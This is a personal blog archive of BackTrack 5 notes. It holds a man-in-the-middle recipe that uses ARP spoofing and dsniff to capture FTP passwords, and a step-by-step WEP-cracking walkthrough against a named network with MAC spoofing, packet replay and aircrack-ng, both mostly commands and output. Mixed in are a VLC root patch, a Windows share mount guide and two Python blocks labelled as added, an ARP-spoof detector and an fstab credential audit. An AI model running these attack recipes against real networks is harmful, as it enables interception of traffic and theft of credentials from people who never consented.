Sulich's Blog

Archive for the category “BackTrack 5”

Man In The Middle Attack

arpspoof -t 192.168.1.101 192.168.1.1

arpspoof -t 192.168.1.1 192.168.1.101

echo 1 > /proc/sys/net/ipv4/ip_forward

urlsnarf -i eth1 – for URLs

or

driftnet -i eth1 – for images

or

dsniff -i eth1 – for FTP passwords
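The two arpspoof commands above poison the ARP caches of both the host and the gateway so that traffic in each direction passes through the forwarding machine. As an added example that is not part of the original post, here is a detector that watches ARP replies for that pattern: an IP whose answering MAC changes, and one MAC claiming more than one IP. The two IP addresses are the ones from the commands; all MAC addresses and the reply stream are constructed.

```python
from collections import defaultdict

# Constructed ARP reply stream as (sender_ip, sender_mac), in arrival order.
# In practice these pairs would be parsed from a sniffer's "arp reply" lines.
SAMPLE_ARP_REPLIES = [
    ("192.168.1.1",   "aa:bb:cc:00:00:01"),  # gateway, legitimate
    ("192.168.1.101", "aa:bb:cc:00:00:02"),  # host, legitimate
    ("192.168.1.1",   "aa:bb:cc:00:00:01"),  # benign repeat, no alert
    ("192.168.1.1",   "de:ad:be:ef:00:99"),  # a third MAC now answers for the gateway
    ("192.168.1.101", "de:ad:be:ef:00:99"),  # ... and for the host as well
]


def detect_arp_spoof(replies, protected_ips=("192.168.1.1",)):
    """Return alerts for IP->MAC flips and for one MAC claiming several IPs.

    A legitimate box with several IP aliases on one NIC also trips the
    second rule, so whitelist such hosts before relying on this as-is.
    """
    ip_to_mac = {}                 # last MAC seen answering for each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed so far
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            level = "HIGH" if ip in protected_ips else "MEDIUM"
            alerts.append(f"{level}: {ip} moved from {previous} to {mac}")
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append(f"HIGH: {mac} claims {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_ARP_REPLIES):
        print(alert)
```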

weevely

http://www.youtube.com/watch?v=vcGw1XX-I94&feature=related

Nessus on BT5

http://pauldotcom.com/2011/05/activating-nessus-on-backtrack.html

Mounting Windows Shares In Linux

http://industriousone.com/blog/mounting-windows-shares-linux

Mounting Windows Shares In Linux

starkos | 20 Apr 2006

I want to access the music collection on our big Windows XP-running game-playing desktop PC from my recycled Linux laptop down in the basement. I found a lot of information on connecting to a Linux file server from a Windows client, but not much on going the other way round. A bit here, and a bit there, and this is what I came up with.

First, edit your /etc/hosts file and give the Windows machine a name:

192.168.1.2   pootie

Next, install the samba and smbfs packages using your method of choice.

Create a directory where the share will appear on your local filesystem.

$ sudo mkdir /mnt/music

Edit /etc/fstab and add a line for the mount. Here “pootie” is the name of the machine and “music” is the name of the share.

//pootie/music  /mnt/music  cifs exec,credentials=/etc/cifspw 0 0

Create a password file /etc/cifspw with the login credentials for your Windows account.

username=Jason
password=ImNotGonnaTellYouThat

And secure the file:

$ sudo chmod 600 /etc/cifspw

Giddyup.

$ sudo mount -a

Update: If you’re still stuck, check out this page on the Ubuntu wiki for more tips.
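The post above keeps the Windows password out of the world-readable /etc/fstab by pointing credentials= at /etc/cifspw and protecting it with chmod 600. As an added check (example code, not from the original post), this audits an fstab for cifs entries that still carry an inline password and verifies that every referenced credentials file is a regular file, not group/other readable, and owned by the expected user. The fstab text is constructed; the /mnt/music line mirrors the post's entry.

```python
import os
import stat

# Constructed fstab text; the /mnt/music line mirrors the post's entry.
SAMPLE_FSTAB = """\
proc            /proc       proc  defaults 0 0
//pootie/music  /mnt/music  cifs  exec,credentials=/etc/cifspw 0 0
//pootie/docs   /mnt/docs   cifs  username=Jason,password=plain 0 0
"""


def cifs_entries(fstab_text):
    """Yield (mountpoint, options dict) for each cifs line in fstab text."""
    for line in fstab_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and not fields[0].startswith("#") and fields[2] == "cifs":
            # "key=value" -> (key, value); a bare flag such as "exec" -> (flag, "")
            opts = dict(opt.partition("=")[::2] for opt in fields[3].split(","))
            yield fields[1], opts


def check_credentials_file(path, expected_uid=0):
    """Return findings for one credentials file; an empty list means it is OK."""
    try:
        st = os.lstat(path)  # lstat: a symlink pointing elsewhere is itself a finding
    except FileNotFoundError:
        return [f"{path}: missing"]
    findings = []
    if not stat.S_ISREG(st.st_mode):
        findings.append(f"{path}: not a regular file")
    if st.st_mode & (stat.S_IRWXG | stat.S_IRWXO):
        mode = oct(stat.S_IMODE(st.st_mode))
        findings.append(f"{path}: mode {mode} is accessible to group/other")
    if st.st_uid != expected_uid:
        findings.append(f"{path}: owner uid {st.st_uid}, expected {expected_uid}")
    return findings


def audit_fstab(fstab_text, expected_uid=0):
    """Flag inline passwords in fstab and weakly protected credentials files."""
    findings = []
    for mountpoint, opts in cifs_entries(fstab_text):
        if "password" in opts:
            findings.append(f"{mountpoint}: password inline in fstab (world-readable)")
        if "credentials" in opts:
            findings.extend(check_credentials_file(opts["credentials"], expected_uid))
    return findings
```

Run it as root against the real file with `audit_fstab(open("/etc/fstab").read())`; the default expected_uid of 0 matches the post, where the file is created with sudo.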

Install and run VLC as root in Backtrack

apt-get install vlc

It refuses to run as root.

To run it as root, do this:

hexedit /usr/bin/vlc

This is the line to edit (the name of the geteuid symbol):

00000620   65 74 00 67  65 74 65 75  69 64 00 5F  5F 6C 69 62  et.geteuid.__lib

Change it to this:

00000620   65 74 00 67  65 74 70 70  69 64 00 5F  5F 6C 69 62  et.getppid.__lib

Ctrl+X to save and exit. VLC now resolves getppid instead of geteuid, and since the parent PID is never 0, its root check no longer triggers.

Aircrack-ng update to 1.1

http://www.aircrack-ng.org/doku.php?id=install_aircrack#installing_aircrack-ng_from_source

sudo apt-get install build-essential

sudo apt-get install libssl-dev

wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1
make
make install

Wifi WEP crack in BT5

root@bt:~# airmon-ng

Interface    Chipset        Driver

eth1        Intel 2200BG    ipw2200 - [phy0]
wlan0        Ralink 2573 USB    rt73usb - [phy4]

root@bt:~# airmon-ng start wlan0

Found 6 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
1431    dhclient3
1522    dhclient3
1659    wpa_supplicant
1689    dhclient
1721    dhclient
24143    dhclient3
Process with PID 1522 (dhclient3) is running on interface eth1
Process with PID 1659 (wpa_supplicant) is running on interface eth1
Process with PID 1721 (dhclient) is running on interface eth1
Process with PID 24103 (ifup) is running on interface wlan0
Process with PID 24143 (dhclient3) is running on interface wlan0

Interface    Chipset        Driver

eth1        Intel 2200BG    ipw2200 - [phy0]
wlan0        Ralink 2573 USB    rt73usb - [phy4]
(monitor mode enabled on mon0)

root@bt:~# ifconfig mon0 down
root@bt:~# macchanger --mac 00:11:22:33:44:55 mon0
Current MAC: 00:0e:2e:f3:e1:18 (Edimax Technology Co., Ltd.)
Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)
root@bt:~# ifconfig mon0 up

root@bt:~# airodump-ng mon0

Copy BSSID and Channel

root@bt:~# airodump-ng -c 1 -w Galina --bssid 00:1B:9E:A7:69:52 mon0

-w (capture file name prefix; the capture is written as Galina-01.cap)

root@bt:~# aireplay-ng -1 0 -a  00:1B:9E:A7:69:52 -h 00:11:22:33:44:55 -e Galina mon0
14:35:30  Waiting for beacon frame (BSSID: 00:1B:9E:A7:69:52) on channel 1

14:35:30  Sending Authentication Request (Open System) [ACK]
14:35:30  Authentication successful
14:35:30  Sending Association Request [ACK]
14:35:30  Association successful :-) (AID: 1)

-e (network name / ESSID)

root@bt:~# aireplay-ng -3 -b  00:1B:9E:A7:69:52 -h 00:11:22:33:44:55 mon0
14:38:15  Waiting for beacon frame (BSSID: 00:1B:9E:A7:69:52) on channel 1
Saving ARP requests in replay_arp-0120-143815.cap
You should also start airodump-ng to capture replies.
Read 629 packets (got 0 ARP requests and 0 ACKs), sent 0 packets…(0 pps)

root@bt:~# aircrack-ng -b 00:1B:9E:A7:69:52 Galina-01.cap

ATI Radeon 7500 on BT5

In Synaptic install fglrx.

Make ipw2200 work in BT5

http://mendrugox.xerminator.dyndns.org/2011/10/make-ipw2200-works-in-bt5/

I like to use an old laptop on which I've installed BT5. From being a useless thing inside a closet it has become a wonderful tool for me nowadays. Although I've a neat Alfa AWUS036H card, it was reasonable that I wanted its internal ipw2200bg card to work too. That is something that doesn't happen when you run BT5 with its default configuration.

If we run dmesg we’ll see that our internal card is detected but something is happening with its firmware.

ipw2200: Detected Intel PRO/Wireless 2200BG Network Connection
ipw2200: ipw2200-bss.fw request_firmware failed: Reason -2
ipw2200: Unable to load firmware: -2
ipw2200: failed to register network device

To solve this issue we have to download the latest firmware for the card. You can get it from the official site http://ipw2200.sourceforge.net/firmware.php. I’ve uploaded the latest version at present, 3.1, so you can get it directly from here: ipw2200-fw-3.1.

Once you get it extract the firmware files:

tar xvfz ipw2200-fw-3.1.tgz

Copy the .fw files to /lib/firmware:

cp ipw2200-fw-3.1/*.fw /lib/firmware/

Reset the driver:

modprobe -r ipw2200

modprobe ipw2200

Done.

Enjoy.

My comment: you also need to change the wireless interface in WICD:

WICD Network Manager -> Preferences -> Wireless interface: eth1
